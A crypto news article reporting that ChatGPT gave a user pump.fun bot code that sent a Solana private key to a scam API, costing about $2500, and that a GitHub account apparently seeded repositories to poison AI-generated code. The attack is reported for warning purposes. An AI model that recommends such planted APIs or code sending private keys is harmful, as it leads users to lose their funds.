「AI Poisoning」 is Unstoppable, Can You Still Code with ChatGPT?

24-11-22 15:24
Read this article in 6 Minutes
总结 AI summary
View the summary 收起

Recently, a user encountered an unexpected online scam while trying to develop an automatic post boosting bot for pump.fun and seeking code help from ChatGPT. The user followed the code guidance provided by ChatGPT, visited a recommended Solana API website, which turned out to be a scam platform, resulting in a loss of about $2500.



According to the user's account, a part of this code required submitting a private key via an API. Due to being preoccupied, the user used their main Solana wallet without conducting a review. Upon reflection, they realized a grave mistake, but at that moment, trust in OpenAI made them overlook the potential risks.



After using the API, the fraudsters swiftly took action and managed to transfer all assets from the user's wallet to the address FdiBGKS8noGHY2fppnDgcgCQts95Ww8HSLUvWbzv1NhX within just 30 minutes. Initially, the user didn't entirely confirm issues with the website, but upon closer inspection of the domain's homepage, conspicuous signs of suspicion were revealed.



Presently, the user is appealing to the community to help block the @solana site and remove associated information from the @OpenAI platform to prevent further harm. They also aim to trace the fraudsters through the clues left behind and bring them to justice.


Scam Sniffer investigation uncovered a malicious code repository designed to steal private keys through AI-generated code.


• solanaapisdev/moonshot-trading-bot

• solanaapisdev/pumpfun-api


Github user 'solanaapisdev' has created multiple code repositories in the last 4 months, attempting to steer AI-generated malicious code.



The reason the user's private key was compromised is that the private key was directly sent to a phishing website in the HTTP request body.



SlowMist founder, Cao Yin, stated, "These are all very unsafe practices, all kinds of 'poisoning.' Not only uploading private keys but also helping users generate private keys online and letting users use them. The documentation is also written in a perfunctory manner."


He also mentioned that these malicious code websites have very limited contact information, with the official website having no content, mainly just documentation and a code repository. "The domain name was registered at the end of September, which makes people feel like it was premeditated poisoning, but there is no evidence to suggest whether it was intentionally poisoning GPT or whether GPT actively collected it."


Scam Sniffer provides security recommendations for code created using AI, including:


• Do not blindly use AI-generated code

• Always carefully review the code

• Store private keys in an offline environment

• Only use trusted sources


Source: Original Article Link


欢迎加入律动 BlockBeats 官方社群:

Telegram 订阅群:https://t.me/theblockbeats

Telegram 交流群:https://t.me/BlockBeats_App

Twitter 官方账号:https://twitter.com/BlockBeatsAsia

举报 Correction/Report
This platform has fully integrated the Farcaster protocol. If you have a Farcaster account, you canLogin to comment
Choose Library
Add Library
Cancel
Finish
Add Library
Visible to myself only
Public
Save
Correction/Report
Submit